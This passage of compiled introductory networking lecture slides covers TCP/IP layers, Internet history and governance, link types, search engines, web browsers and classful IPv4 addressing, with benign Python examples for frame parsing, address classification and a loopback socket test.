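    total_len, ttl, proto = struct.unpack("!H", ip[2:4])[0], ip[8], ip[9]
    if proto != 17:
        raise ValueError("not UDP")
    udp = ip[ihl:total_len]
    sport, dport, udp_len, _checksum = struct.unpack("!HHHH", udp[:8])
    return {
        "src_mac": ":".join("%02x" % b for b in frame[6:12]),
        "dst_mac": ":".join("%02x" % b for b in frame[:6]),
        "src_ip": ".".join(str(b) for b in ip[12:16]),
        "dst_ip": ".".join(str(b) for b in ip[16:20]),
        "ttl": ttl, "sport": sport, "dport": dport,
        "payload": udp[8:udp_len],
    }


if __name__ == "__main__":
    frame = build_frame("aa:aa:aa:aa:aa:aa", "cc:cc:cc:cc:cc:cc",
                        "192.168.0.1", "12.6.1.3", 40000, 53, b"hello")
    print(len(frame), "bytes:", frame.hex())
    print(parse_frame(frame))
```

The checksum catches accidental corruption, not tampering: an attacker who rewrites an address simply recomputes it. That is why integrity against an adversary has to come from a higher layer (TLS, IPsec) rather than from anything in these headers.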

TCP/IP Model
Application Layer
– Application programs using the network
Transport Layer (TCP/UDP)
– Management of end-to-end message transmission, error detection and error correction
Network Layer (IP)
– Handling of datagrams: routing and congestion
Data Link Layer
– Management of cost-effective and reliable data delivery, access to physical networks
Physical Layer
– Physical media

The Internet

Introductory material.
An overview lecture that covers Internet-related topics, including a definition of the Internet, an overview of its history and growth, and standardization and naming.

A Definition
• On October 24, 1995, the FNC unanimously passed a resolution defining the term Internet.

RESOLUTION: The Federal Networking Council (FNC) agrees that the following language reflects our definition of the term "Internet".
"Internet" refers to the global information system that --
(i) is logically linked together by a globally unique address space based on the Internet Protocol (IP) or its subsequent extensions/follow-ons;
(ii) is able to support communications using the Transmission Control Protocol/Internet Protocol (TCP/IP) suite or its subsequent extensions/follow-ons, and/or other IP-compatible protocols; and
(iii) provides, uses or makes accessible, either publicly or privately, high level services layered on the communications and related infrastructure described herein.

History of the Internet

Mid 1960s: Papers on “packet switching” emerge.
End of the 1960s: ARPA sponsors the development of a packet-switching network, called the ARPANET. The first four nodes are UCLA, SRI, U. Utah, UCSB.
1974: The TCP/IP protocols and model are proposed by Cerf/Kahn.
1983: ARPANET adopts TCP/IP. At this time, the ARPANET has 200 routers.
1984: NSF funds a TCP/IP based backbone network. This backbone grows into the NSFNET, which becomes the successor of the ARPANET.
1995: NSF stops funding of NSFNET. The Internet is completely commercial.

Applications of the Internet

• Traditional core applications:
– Email
– News
– Remote Login
– File Transfer
• The killer application:
– World-Wide Web (WWW)
• Future applications:
– Videoconferencing and Telephony
– Multimedia Services
– Internet Broadcast

Time Line of the Internet

(Figure: Internet timeline. Source: Internet Society.)

Growth of the Internet

(Figure: number of hosts on the Internet, Aug-81 to Aug-01, on a logarithmic scale from 100 to 1,000,000,000; the count reaches roughly 100,000,000 by 2001. Source: Internet Software Consortium.)

Internet Infrastructure

(Figure: backbone networks interconnected at IXPs; regional networks attached to the backbones; local ISPs, corporate networks and campus networks attached to regional networks or local ISPs.)

Telecommunications & The Internet

Basic Telecom Model

(Figure: Computer – channel interface – communication channel – channel interface – Computer.)

Typical Home Telecom Model

(Figure: Computer – digital signals – Modem – analog signals over audio phone lines – Modem – digital signals – Computer.)

Channels
• Twisted wire (twisted pair)
• Coaxial Cable
• Fiber Optics
• Microwave
• Newer Wireless

Twisted Pair
• Low cost
• easy to work with
• installed infrastructure
• crosstalk
• 300 bps to 100 Mbps in the slide’s era (Cat 6a cabling now carries 10 Gbps over short runs)
• “This modem is 56Kbps capable. However, current regulations limit download speeds to 53Kbps,” the fine print from a typical modem advertisement.

DSL
• Uses existing twisted pair
• 256 Kbps to 40 Mbps
• Loop length max about 18,000 ft.
• More correctly ADSL (Asymmetric Digital Subscriber Line), with download speeds different from upload speeds.

Coaxial Cable
• More expensive
• harder to work with
• not as extensive an existing infrastructure
– cable TV companies are changing this
• 56 Kbps to 550 Mbps

Fiber Optics
• Very expensive
• difficult to work with
• existing infrastructure historically limited to backbones (fibre to the home is now common)
• 500 Kbps to 30 Gbps in the slide’s figures; with wavelength multiplexing a single modern fibre carries terabits per second

Microwave
• Not as expensive as land lines
• Limited to line of sight (towers)
– reasonable infrastructure
• Satellite bounce increases expense
– geosynchronous (22,000 miles)
– low earth orbit (cheaper, lower power)
• 256 Kbps to 100 Mbps

Newer Wireless
– Cellular
– mobile data networks
– personal communications services (PCS)
– note: pagers & PDAs are not channels; they would be nodes on one end of a channel

Transmission Speed
• BPS, bits per second: the amount of information that can be transmitted through a channel.
• BAUD: signalling events (symbols) per second, e.g. a change from positive to negative voltage or vice versa.

Speed II
• At higher speeds a single signal change can transmit more than one bit at a time (with 2^n distinguishable symbols each one carries n bits), so the bit rate will generally be higher than the baud rate.
• Transmission capacity is a function of the frequency; higher frequency means higher capacity.

More Speed
• Bandwidth = range of frequencies that a channel can support (difference between highest and lowest frequency).
• Greater range means greater bandwidth.
• Greater bandwidth means greater transmission capacity.

Faster Yet
• Bandwidth is like pipe diameter.
• Larger diameter pipes can transmit more water in a given period of time.
• Of the channels listed, fiber optics has by far the greatest bandwidth; radio-based services such as PCS have far less.

Communications Processors

(Figure: a host CPU with a front-end processor; a controller, a concentrator, a multiplexer and a channel feeding terminals (T) and PCs.)

Network Topology

(Figure: star, bus and ring networks of computers (C) and printers (P).)

Networks
• Local Area Network, LAN
• Wide Area Network, WAN
• Value Added Network, VAN

Network Terms
• File server
• Print server
• Gateway – connects dissimilar networks
• Bridge – connects similar networks
• Routers – connect networks & direct traffic
• Similar networks = same network protocols

Transmission on LANs
• Token Ring
– can talk only when you have the token
– costs more than Ethernet
– better for high-volume traffic
• Ethernet
– talk whenever you want
– send again if there is a collision
– works best with low-volume traffic (on a shared medium; full-duplex switched Ethernet has no collisions at all)

Transmission on WANs & VANs

• Packet Switching
– message broken into packets
– packets may take various routes
– message reassembled at destination
– allows load balancing on channels
• Frame Relay
– like packet switching, but with no error correction inside the network

Internet Capabilities

• Communications
– E-mail
– Usenet
– Chatting
– Telnet
• Information Retrieval
– Gopher
– Archie
– WAIS
– FTP

World Wide Web

• Set of standards for storing, retrieving, formatting, and displaying information using a client/server architecture
• HyperText Markup Language (HTML)
• browser
• search engines

Putting It All Together

(Figure: consumers connect to regional providers such as I29 and Cable One, which connect to upper-tier providers AT&T, Level 3 and CenturyLink.)

Some Upper Tier Providers

• AT&T
• Bell Atlantic
• Bell South
• Cable and Wireless
• Cable One
• GTE
• IBM
• MCI
• Pacific Bell
• Qwest
• Sprint
• US West

Tier 1 Networks
• The largest backbones on the Internet:
• CenturyLink, Telecom Italia, Verizon, Sprint, TeliaSonera International, NTT Communications, Deutsche Telekom, Level 3, AT&T
• These top-branded backbones exchange traffic among themselves through settlement-free peering; everyone else pays one of them (or a customer of one) for transit.

Common Bandwidths
• 56K modem 0.056 Mbps
• ADSL up to 40 Mbps
• Cable Modem 50 Mbps
• T1 1.5 Mbps
• Ethernet 10 to 1,000 Mbps
• T3 44.7 Mbps
• See http://bandwidthplace.com/

Upper Tier Bandwidths

OC-x: multiples of 51.84 Mbps (OC-1)

• OC-3 155 Mbps
• OC-12 622 Mbps
• OC-48 2,488 Mbps
• OC-96 4,977 Mbps
• OC-192 9,953 Mbps
• OC-768 39,813 Mbps

Organization Benefits of Internet

• Reducing Communication Costs


– virtual private network (VPN) over the Internet in place of leased lines
• Enhancing Communication and Coordination
• Accelerating the Distribution of Knowledge
• Facilitating Electronic Commerce
120

Intranets
• An internal network based on World Wide
Web technology
• Firewall
– a device or software that filters traffic between the Internet and the intranet to block unauthorized access
• Firebreak
– a physical break (no connection at all, an "air gap") between the Internet and the intranet
121

IP Addresses
• An identifier for a computer or device on a TCP/IP network. Networks using the TCP/IP protocol route messages based on the IP address of the destination. An IPv4 address is a 32-bit number written as four decimal numbers (octets) separated by periods, each in the range 0 to 255. For example, 1.160.10.240 could be an IP address.
122

IP Address Registries

• Regional Internet Registries:
• American Registry for Internet Numbers, ARIN
• Réseaux IP Européens Network Coordination Centre, RIPE NCC
• Asia Pacific Network Information Centre, APNIC
• Latin American and Caribbean Internet Addresses Registry, LACNIC
• African Network Information Centre, AFRINIC
123

Internet Infrastructure

• The infrastructure of the Internet consists of a federation of connected networks that are each independently managed ("autonomous systems")
– Note: each autonomous system may consist of multiple IP networks

• Hierarchy of network service providers (NSPs)
– Tier-1: national or worldwide network (US: fewer than 20)
– Tier-2: regional networks (in US: fewer than 100)
– Tier-3: local Internet service providers (in US: several thousand)

124

Internet Infrastructure
• The location where a network (ISP, corporate network, or regional network) gets access to the Internet is called a Point-of-Presence (POP).
• Locations where (Tier-1 or Tier-2) networks are connected for the purpose of exchanging traffic are called peering points.
– Public peering: traffic is swapped at a shared location, called an Internet exchange point (IXP)
– Private peering: two networks establish a direct link to each other.

125

Topology of a Tier-1 NSP

(diagram: the nodes of the backbone and the links interconnecting them)
126

Organization of a single node in a Tier-1 network

(diagram: the node's routers and switches, labelled 3Com and Bay Networks, connect to peering points, to the other nodes of the network, to metropolitan area networks, and to customers over leased links and over modem banks for dial-up links)

127

Who is Who on the Internet ?


• Internet Society (ISOC): founded in 1992, an international nonprofit professional organization that provides administrative support for the Internet and is the organizational home for the Internet's standardization bodies.
• Internet Engineering Task Force (IETF): forum that coordinates the development of new protocols and standards. Organized into working groups, each devoted to a specific topic or protocol. Working groups document their work in reports called Requests For Comments (RFCs).
• Internet Research Task Force (IRTF): composed of a number of focused, long-term and small research groups.
• Internet Architecture Board (IAB): a technical advisory group of the Internet Society; provides oversight of the architecture of the protocols and of the standardization process.
• Internet Engineering Steering Group (IESG): responsible for the technical management of IETF activities and the Internet standards process; composed of the Area Directors of the IETF.

128

Internet Standardization Process


• Working group output and other documents of the Internet are published as RFCs (Request for Comments).

• RFCs are the basis for Internet standards.

• Not all RFCs become Internet Standards! (When these slides were written there were more than 3000 RFCs and fewer than 70 Internet Standards; most RFCs are informational, experimental or best-current-practice documents.)

• A typical (but not the only) path to standardization is:
– Internet Draft
– RFC
– Proposed Standard
– Draft Standard (required two independent, interoperable implementations; this level was retired by RFC 6410)
– Internet Standard (approved by the IESG)

129
Assigning Identifiers for the Internet

• Who gives a university the domain name "tcpip-lab.edu" and who assigns it the network prefix "128.143.0.0/16"? Who assigns port 80 as the default port for web servers?

• The functions associated with the assignment of numbers are referred to as the Internet Assigned Numbers Authority (IANA).
• Early days of the Internet: the IANA functions were administered by a single person (Jon Postel).
Today:
• The Internet Corporation for Assigned Names and Numbers (ICANN) assumes responsibility for the assignment of technical protocol parameters, allocation of the IP address space, management of the domain name system, and others.
• Management of IP addresses is done by the Regional Internet Registries (RIRs):
– APNIC (Asia Pacific Network Information Centre)
– RIPE NCC (Réseaux IP Européens Network Coordination Centre)
– ARIN (American Registry for Internet Numbers)
– LACNIC (Latin American and Caribbean Internet Addresses Registry)
– AFRINIC (African Network Information Centre)
• Domain names are administered by a large number of private organizations (registrars) that are accredited by ICANN.

130

Review
131

What is the Internet?


The Internet is a global web of computers connected to each other by wires (historically mostly phone lines; today also fibre, cable and radio links). Think of a map of big cities, smaller towns and scattered houses, each connected by roads and railways: the Internet is similar, except that the wires connect computers. The Internet is a superhighway.
132
133

Some ways to use the Internet

• E-mail
• Research
• Shopping
• News
• Games
• Ed-line
134

Do you ever use the Internet?


135

How often do you use the Internet?


136

Why do you generally use the Internet?
137

Internet Terms
• WWW
• Browser
• Search Engine
• URL
• Domain
• html
138

WWW
• The World Wide Web
139

Browser
• Software program that lets a person view WWW documents. Examples of browsers are Netscape, Microsoft Internet Explorer, Mosaic, MacWeb and NetCruiser.
140

Let's look at some examples of browsers.
141

Search Engine
• A web site that will help you search the
Internet for key words, subjects, etc.
142

Let’s try a search now!


143

URL
• UNIFORM RESOURCE LOCATOR- The
unique address of any web page. It tells
your computer where the information is
stored so it can be viewed.
144

Now we are going to look at a URL


145

Domain
• A way to indicate what type of site you may be viewing. In the U.S. some common top-level domains are .com (commercial), .org (non-profit and research organizations), .gov (government agency) and .edu (education). More are constantly being added, so these should only be used as guidelines to help you know what type of site you are on; anyone can register a .com or .org name, so the domain alone says nothing about who is behind a site.
146

Internet Connection
• The Logistics / ICT Manager ensures Internet service for staff using the ACF e-mail service and computers.
• The mission standard is a Local Area Network connection over network cable and wireless access points (Wi-Fi).
• A Local Area Network provides Internet access to computers and other devices in a limited area. The connection is established by wire or wirelessly.

• WAN - Wide Area Network
– Public Internet: reached when you go outside the Local Area Network through an Internet Service Provider (ISP)

2016 147

(diagram: INTERNET -> cable, DSL, VSAT or BLR modem -> router (WAN side) -> LAN switch -> wireless access point)
August 19, 2021 148

LAN problems
Wi-Fi (Wireless Fidelity)

– Uses radio frequency technology
– No physical wired connection between sender and receiver
– Wi-Fi radios emit electromagnetic waves into their surroundings. The 2.4 GHz and 5 GHz bands Wi-Fi uses propagate roughly line-of-sight and are attenuated or reflected by walls, floors and people; unlike low-frequency HF radio they are not reflected back by the ionosphere. A signal that leaks out of the building is therefore still receivable by anyone nearby, which is why the network must be protected by encryption, not by walls.

Problems with Wi-Fi

– Limited coverage area
– Interference from nearby wireless devices
– Overlap with other networks' signals (channel contention)
– Obstacles attenuating the signal
– Congestion of data flows

2016 149

LAN Problems
• Wi-Fi or LAN is not connected.
• The wireless adapter might be disabled.
• The cable may be disconnected if you are using a patch cord for network connectivity.
• Difference when using cable and Wi-Fi:
• Wi-Fi
• Cable
2016 150

Basic Problem Troubleshooting


• Check whether the Wi-Fi or the LAN is connected or not.
• Use the Network Diagnostic tool.
• Check whether the wireless button is ON or OFF; turn it ON.
• Control Panel\All Control Panel Items\Network and Sharing Center
2016 151

Popular Search Engines Worldwide
152

1 - Google
• According to the latest netmarketshare report (January
2018) 74.52% of searches were powered by Google and
only 7.98% by Bing.
• Google is also dominating the mobile/tablet search engine
market share with 93%!
• Want to learn how to take advantage of Google’s search
engine share?
– Read: How long does it take to rank in Google
153

2 - Bing
• Bing is Microsoft’s attempt to challenge Google in the area
of search.
• Despite their efforts they still did not manage to convince
users that their search engine can produce better results
than Google.
154

3 - Yahoo! Search

• Since October 2011 Yahoo search is powered by Bing.


• Yahoo is still the most popular email provider and
according to some studies holds the fourth place in
search.
155

4 - Ask
• Formerly known as Ask Jeeves, Ask.com receives approximately
0.05% of the search share.
• ASK is based on a question/answer format where most
questions are answered by other users or are in the form of
polls.
• It also has the general search functionality but the results
returned lack quality compared to Google or even Bing and
Yahoo.
156

5 - Aol Search
• According to netmarketshare the old time famous AOL is
still in the top 10 search engines with a market share that
is close to 0.04%.
• The AOL network includes many popular web sites like
engadget.com, techchrunch.com and the
huffingtonpost.com.
157

6. Baidu
• Baidu was founded in 2000 and it is the most popular
search engine in China.
• Its market share is increasing steadily and, according to Wikipedia, Baidu serves billions of search queries per month.
• It is currently ranked at position 4 in the Alexa rankings.
158

7. Wolframalpha
• Wolframalpha is different from all the other search engines.
• They market it as a Computational Knowledge Engine
which can give you facts and data for a number of topics.
• It can do all sorts of calculations, for example if you
enter “mortgage 2000” as input it will calculate your loan
amount, interest paid etc. based on a number of
assumptions.
159

8. DuckDuckGo

• Has a number of advantages over the other search


engines.
– It has a clean interface, it does not track users, it is not fully
loaded with ads and has a number of very nice features (only
one page of results, you can search directly other web sites
etc).
• Update: According to duckduckgo traffic stats, as of
October 2018, duckduckgo is serving more than 30 million
searches per day.
160

9. Internet Archive

• Blocked here at school.


• archive.org is the Internet Archive's search engine (the Wayback Machine).
• You can use it to find out how a web site looked at any time since 1996.
• It is a very useful tool if you want to trace the history of a domain and examine how it has changed over the years.
161
10. Yandex.ru

• Can’t reach this page in school.


• According to Alexa, Yandex.ru is among the 30 most popular websites on the Internet, with a ranking position of 4 in Russia.
• Yandex present themselves as a technology company that
builds intelligent products and services powered by
machine learning.
162

Dogpile
• Since the last two don’t work, let’s try one that does.
163

• As a final word, if you search “What is the best search engine?”


in any of the search engines listed above, you will get an answer
that Google is the best and most popular search engine and
Bing is in the second place (on a Global level).
• These are the 10 best and most popular search engines on the
Internet today.
• The list is by no means complete and for sure many more will be
created in the future but as far as the first places are concerned,
Google and Bing will hold the lead positions for years to come.
164
What is web browser or Internet
browser ?
• A web browser or Internet browser is a software application for retrieving, presenting, and traversing information resources on the World Wide Web. An information resource is identified by a Uniform Resource Identifier (URI) and may be a web page, image, video, or other piece of content. Hyperlinks present in resources enable users to easily navigate their browsers to related resources.
165

What is the Technology?

• Although browsers are primarily intended to access


the World Wide Web, they can also be used to access
information provided by Web servers in private
networks or files in file systems. Some browsers can
also be used to save information resources to file
systems.
166

Who Developed it? When? Why?


• Tim Berners-Lee developed the first browser in December 1990. It was released in March 1991.
• Interview with Tim Berners-Lee: Why did you invent the WWW?

• "Well, I found it frustrating that in those days, there was different information on different computers, but you had to log on to different computers to get at it. Also, sometimes you had to learn a different program on each computer." said Tim Berners-Lee.

• People at CERN came from universities all over, with all types of computers.
167

History and Milestones


• WorldWideWeb. Tim Berners-Lee, Christmas day, 1990.
• libwww. Berners-Lee and a student at CERN named Jean-Francois Groff, 1991/1992.
• Line-mode. Nicola Pellow, 1991.
• Erwise. After a visit from Robert Cailliau, a group of students at Helsinki University of Technology joined together to write a web browser. April, 1992.
168

1990 Web Browser


169

History and Milestones

• ViolaWWW. Pei Wei, a student at the University of California at Berkeley, released the second browser for Unix, called ViolaWWW, in May, 1992.
• Midas. Summer 1992, Tony Johnson at SLAC developed a third browser for Unix systems.
• Samba. Robert Cailliau started development of the first web browser for the Macintosh, called Samba. Development was picked up by Nicola Pellow, and the browser was functional by the end of 1992.
170

History and Milestones

• Mosaic. Marc Andreessen and Eric Bina, February 1993.

• Arena. In 1993, Dave Raggett at Hewlett-Packard.

• Lynx. Lou Montulli released the web browser Lynx 2.0 in March 1993.

• Cello. Tom Bruce, cofounder of the Legal Information Institute, developed a web browser for Windows called Cello, finished in the summer of 1993.
171

1993 Mosaic Browser

172

History and Milestones


• Opera. In 1994, the Opera browser was developed by a
team of researchers at a telecommunication company
called Telenor in Oslo, Norway.

• Internet in a box. January, 1994, O'Reilly and Associates


173

History and Milestones


• Navipress. In February, 1994, Navisoft released a browser for the PC and Macintosh called Navipress.

• Mozilla. In October, 1994, Netscape released the first beta version of their browser, Mozilla 0.96b, over the Internet.

• Internet Explorer. On August 23rd, 1995, Microsoft released their Windows 95 operating system, including a Web browser called Internet Explorer.
174
What Groups are Responsible for
Managing it?
• The Information Technology group of the
company.
• Developer of the software
175
What Groups are Responsible for
Managing it?
• Mozilla is a global community dedicated to building free, open
source products like Firefox web browser and Thunderbird email
software.

• Mozilla Firefox is a free and open source web browser descended


from the Mozilla Application Suite and managed by Mozilla
Corporation.
– Functions can be added through extensions, created by third-party
developers

• The Mozilla project was created in 1998 with the release of the
Netscape browser suite source code that was intended to harness
the creative power of thousands of programmers on the Internet.
176
What Groups are Responsible for
Managing it?
• Instead of just working on Netscape's next browser, people started
creating a variety of browsers, development tools and a range of other
projects.

• In ten years the community has shown that commercial companies can
benefit by collaborating in open source projects and that great end user
products can be produced as open source software.

• A sustainable organization has been created that uses market


mechanisms to support a public benefit mission and this model has
been reused by others to create open, transparent and collaborative
organizations in a broad range of areas.
177
What Groups are Responsible for
Managing it?
• WebKit is a layout engine designed to allow web browsers to render web pages.
• It powers Safari; Google Chrome used it until 2013, when Google forked it into its own engine, Blink.
• The WebKit engine provides a set of classes to display web content in windows, and implements browser features such as following links when clicked by the user, managing a back-forward list, and managing a history of pages recently visited.
179

Growth of the Web Browser


• For years, the Web browser was a
technology that seemed frozen in time.
While the Web itself exploded with new
types of content and virtual communities,
the way users accessed that material
changed hardly at all from 1997 to 2004.
180

Growth of the Web Browser


• Of course, new versions of the most popular Web browsers come along regularly. Microsoft released Internet Explorer 9 on March 14, 2011; Mozilla upgraded Firefox to version 4 on March 22, 2011.
181

Growth of the Web Browser


• Browster, for example, offers a free add-on
for Internet Explorer and the Mozilla
Foundation's open-source Firefox browser
that's a simpler alternative to using the
"Back" button.
182


Growth of the Web Browser


• A plugin for Internet Explorer and Firefox, lets
users preview other Web pages without
leaving the current one, by moving a cursor
over an icon appearing above each link.
184

Growth of the Web Browser


• Companies like Flock are developing entirely new browsers to facilitate now-common social activities, such as blogging, RSS-based news reading, and photo sharing.
• Not only can you use a browser on the computer, it is now integrated into mobile devices, DVD players, and video game consoles.
185
Related and Competing
Technologies
• Apps, social networks

186

Pros and Cons


• Firefox
– Pros: Fast, very customizable, uses fewer system
resources than most
– Cons: So many options can be confusing, crash on
one tab crashes all, private browsing requires add-
in, many other features require add-ins
187

Pros and Cons


• Google Chrome
– Pros: Fast and simple, stable, private browsing
option, enables offline use of Internet apps
– Cons: No ad blocking, minimal options, skimpy
bookmarking, uses a lot of system resources
188

Pros and Cons


• Opera
– Pros: Doesn’t bog down older computers,
excellent history of searching, synchronize across
computers
– Cons: No ad blocking, not the fastest, no private
browsing
189
Creation of Accessibility Limitations
and Improvements
• The browser as operating system,
• Functionally-limited mobile applications,
• Web-enhanced devices,
• Personalization.
190

Pushing the Limits


• Flock 2.5
• Firefox 5
• Internet Explorer 9
• webOS
• Chrome OS
191

Future Technology
• Worldwide Market Shares
• Influence of Google Chrome
• Competition amongst Web Browsers
192
Addressing
An IPv4 address is 32 bits long.
• It is usually written as four decimal numbers separated by dots (periods): dotted decimal notation.
• Each of the four numbers represents 8 bits and is called an octet; the same octets can equally be written in hex.
• Example: 137.207.192.3, or 89 CF C0 03 in hex.
• An IP address contains a network part and a host part.
• The number of address bits used to identify the network, and the number used to identify the host, vary according to the class of the address.
• Routers or gateways have one or more addresses (one per link they attach to). The three main address classes are class A, class B, and class C.
• By examining the first few bits of an address, IP software can quickly determine the address class, and therefore its structure.
IP Addressing 193

Note:
For Class A: Have a first dotted decimal number in the range 1-126
For Class B: Have a first dotted decimal number in the range 128-191
For Class C: Have a first dotted decimal number in the range 192-223
194
IP Addressing
• There are five forms of IP addresses:
Class A: 126 networks, each can have up to (16M-2) hosts.
(1.0.0.0 - 126.0.0.0)
Class B: (16K-2) networks, each can have up to (64K-2) hosts.
(128.0.0.0 - 191.255.0.0)
Class C: (2M-2) networks, each can have up to 254 hosts.
(192.0.0.0 - 223.255.255.0)
Class D: multicast addresses.
(224.0.0.0 - 239.255.255.255)
Class E: reserved for future use.
(240.0.0.0 - 255.255.255.255)
195
IP address format
196

IP address

For example:
The address (binary) - 10000000 00000111 00001111 00000001
has the DECIMAL DOT NOTATION: 128.7.15.1
It belongs to Class B addresses.
Its Network-id is: 128.7
Its Host-id is: 15.1
197
IP Addresses assignment example
198

Class A

If the first bit of an IP address is 0, it is the address of a class A network.

The first bit of a class A address identifies the address class.
The next seven bits identify the network, and
the last 24 bits identify the host.
There are fewer than 128 class A network numbers, but each class A network can have millions of hosts.
199
Class A
• The first bit (0) is used to determine that an address belongs to class A.
• 7 bits are used for the network address. Therefore, the number of class A networks can be 2^7 = 128. Number 0 is not used, and number 127 is used for loopback testing on each host. There are 126 usable Class A network numbers, which have a first dotted decimal number in the range 1 to 126.
• 24 bits are used for the host address. Therefore, each Class A network has 2^24 = 16,777,216 host addresses, of which 16,777,214 are assignable (the all-zeros and all-ones host numbers are reserved).
• Class A was not available to the general public; it was restricted to special uses and very large organizations.

Class A final format:

| 0 | 7 bits network part | 24 bits host part |
200

Class A

Summary:

• If the first decimal number in the IP address is 1 to 126, then it is a class A address.
• The first byte is the network number, and the next three bytes are the host address.
201

Class B

• If the first two bits of the address are 1 and 0, it is a class B network address.
• The first two bits identify the class; the next fourteen bits identify the network, and the last sixteen bits identify the host.
• There are thousands of class B network numbers.
• Each class B network can have thousands of hosts.
202

Class B
• The first two bits (10) are used to determine that an address belongs to class B.
• 14 (6 + 8) bits are used for the network address. Therefore, the number of class B networks can be 2^14 = 16,384. Class B network numbers have a first dotted decimal number in the range 128 to 191.
• 16 bits are used for the host address. Therefore, each Class B network has 2^16 = 65,536 host addresses, of which 65,534 are assignable (the all-zeros and all-ones host numbers are reserved).
203
Class B

Class B final format

| 10 | 14 bits network part | 16 bits host part |
Summary:

• If the first decimal number in the IP address is 128 to 191, then it is a class B address.
• The first two bytes identify the network.
• The last two bytes identify the host.
204

Class C

• If the first three bits of the address are 1 1 0, it is a class C network address.
• The first three bits are class identifiers.
• The next 21 bits are for the network address.
• The last eight bits identify the host.
• There are millions of class C network numbers.
• However, each class C network can have only 254 hosts.
205
Class C

• The first three bits (110) are used to determine that an address belongs to class C.
• 21 (5 + 16) bits are used for the network address. Therefore, the number of class C networks can be 2^21 = 2,097,152. Class C network numbers have a first dotted decimal number in the range 192 to 223.
• 8 bits are used for the host address. Therefore, each Class C network has 2^8 = 256 host addresses, of which 254 are assignable (the all-zeros and all-ones host numbers are reserved).
206
Class C

Class C final format

| 110 | 21 bits network part | 8 bits host part |

Summary:

• If the first decimal number in the IP address is 192 to 223, then it is a class C address.
• The first three bytes are for the network address.
• The last byte is for the host number.
207

Summary
• Class A:Few networks, each with many hosts.
• Class B: Medium number of networks, each
with a medium number of hosts
• Class C: Many networks, each with a few
hosts.
208
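A worked example of the classful decoding described in the slides above (added here; it is not part of the original slides). It classifies an address from its leading bits, splits it into the network-id and host-id exactly as the 128.7.15.1 example does, and adds the check a practitioner actually wants: whether an address can be configured on a host at all (loopback, multicast, reserved, all-zeros and all-ones host numbers cannot). Sample addresses other than the slides' 128.7.15.1 are constructed.

```python
# Added example: classful IPv4 decoding from the address's leading bits.
# Not part of the original slides. The sample addresses are constructed,
# except 128.7.15.1, which the slides use.


def parse_ipv4(text):
    """Parse dotted decimal into a 32-bit int, rejecting malformed input."""
    parts = text.split(".")
    if len(parts) != 4:
        raise ValueError(f"expected four octets: {text!r}")
    value = 0
    for part in parts:
        if not part.isdigit() or int(part) > 255:
            raise ValueError(f"bad octet {part!r} in {text!r}")
        value = (value << 8) | int(part)
    return value


def _dotted(value, n_bytes):
    """Render the low n_bytes bytes of value in dotted decimal."""
    return ".".join(str((value >> (8 * i)) & 0xFF) for i in reversed(range(n_bytes)))


def classify(text):
    """Return the class and, for A/B/C, the network-id / host-id split."""
    addr = parse_ipv4(text)
    # The class is fixed by the leading bits, which is why a router can decide
    # the structure of an address without any extra lookup.
    if addr >> 31 == 0b0:
        cls, net_bits = "A", 8
    elif addr >> 30 == 0b10:
        cls, net_bits = "B", 16
    elif addr >> 29 == 0b110:
        cls, net_bits = "C", 24
    elif addr >> 28 == 0b1110:
        return {"class": "D", "note": "multicast group, no network/host split"}
    else:
        return {"class": "E", "note": "reserved, 240.0.0.0 - 255.255.255.255"}

    host_bits = 32 - net_bits
    host_mask = (1 << host_bits) - 1
    host_id = addr & host_mask
    return {
        "class": cls,
        "network_id": _dotted(addr >> host_bits, net_bits // 8),
        "host_id": _dotted(host_id, host_bits // 8),
        "host_bits": host_bits,
        # All-zeros means "this network" and all-ones is the directed
        # broadcast, so two host numbers per network can never name a host.
        "usable_hosts": (1 << host_bits) - 2,
        "loopback": cls == "A" and (addr >> 24) == 127,
        "host_all_zeros": host_id == 0,
        "host_all_ones": host_id == host_mask,
    }


def is_assignable_host(text):
    """True if the address may be configured on a host interface."""
    info = classify(text)
    if info["class"] not in ("A", "B", "C"):
        return False
    return not (info["loopback"] or info["host_all_zeros"] or info["host_all_ones"])


if __name__ == "__main__":
    for sample in ("128.7.15.1", "10.1.2.3", "192.168.1.255", "224.0.0.1", "127.0.0.1"):
        print(sample, classify(sample), "assignable:", is_assignable_host(sample))
```

Running the block prints, for the slides' own example, class B with network-id 128.7 and host-id 15.1; 192.168.1.255 is correctly refused as the directed broadcast of its class C network.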

Loopback Address
• IP defines a loopback address used to test network applications.
• Programmers often use loopback testing for preliminary
debugging after a network application has been created.
• To perform a loopback test, a programmer must have two
application programs that are intended to communicate across a
network.
• Each application includes the code needed to interact with
TCP/IP protocol software.
• Instead of executing each program on a separate computer, the
programmer runs both programs on a single computer and
instructs them to use a loopback IP address when
communicating.
209

Loopback Address
• When one application sends data to another, data travels
down the protocol stack to the IP software and then IP
software forwards it up through the protocol stack to the
second program.
• Thus programmer can test the program logic quickly
without using two computers and without sending packets
across the network.
• During loopback testing, packets do not leave the computer: the IP software forwards them from one application to the other.
• The loopback address never appears in a packet travelling across a network; the whole 127.0.0.0/8 block is reserved for this, and routers must never forward packets addressed to it.
210

Limited Broadcast Address


• Refers to a broadcast on the local physical network.
• Informally, the broadcast is limited to a "single wire".
• Limited broadcast is used during startup by a computer that does not yet know its network number (for example when requesting an address with DHCP).
• IP reserves the address consisting of all 1 bits (255.255.255.255) to refer to limited broadcast.
• IP will broadcast any packet sent to the all-ones address across the local network; routers never forward it beyond that network.
211
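The loopback test described above, as an added example that is not part of the original slides: a server and a client run in the same process, the server bound only to 127.0.0.1, and the data makes a round trip through the IP stack without leaving the machine. It also implements the two address checks the slides describe (127.0.0.0/8 and the all-ones limited broadcast) and shows the socket option that sending to 255.255.255.255 requires, which is the detail that trips people up when writing discovery tools. The payload is constructed; the port is whatever the kernel hands out.

```python
# Added example: a loopback round trip between two programs on one host, plus
# recognition of the loopback and limited-broadcast addresses. Not part of the
# original slides; the payload is constructed.
import socket
import struct
import threading

LOOPBACK_FIRST_OCTET = 127
LIMITED_BROADCAST = 0xFFFFFFFF  # 255.255.255.255, all 32 bits set


def ip_to_int(text):
    return struct.unpack("!I", socket.inet_aton(text))[0]


def is_loopback(text):
    """Anything in 127.0.0.0/8 stays inside the host, not just 127.0.0.1."""
    return (ip_to_int(text) >> 24) == LOOPBACK_FIRST_OCTET


def is_limited_broadcast(text):
    """All-ones address: delivered to every host on the local link only."""
    return ip_to_int(text) == LIMITED_BROADCAST


def _serve_one(listener, result):
    """Accept one client, echo its data upper-cased, record the peer address."""
    conn, peer = listener.accept()
    with conn:
        data = conn.recv(4096)
        conn.sendall(data.upper())
    result["peer_ip"] = peer[0]


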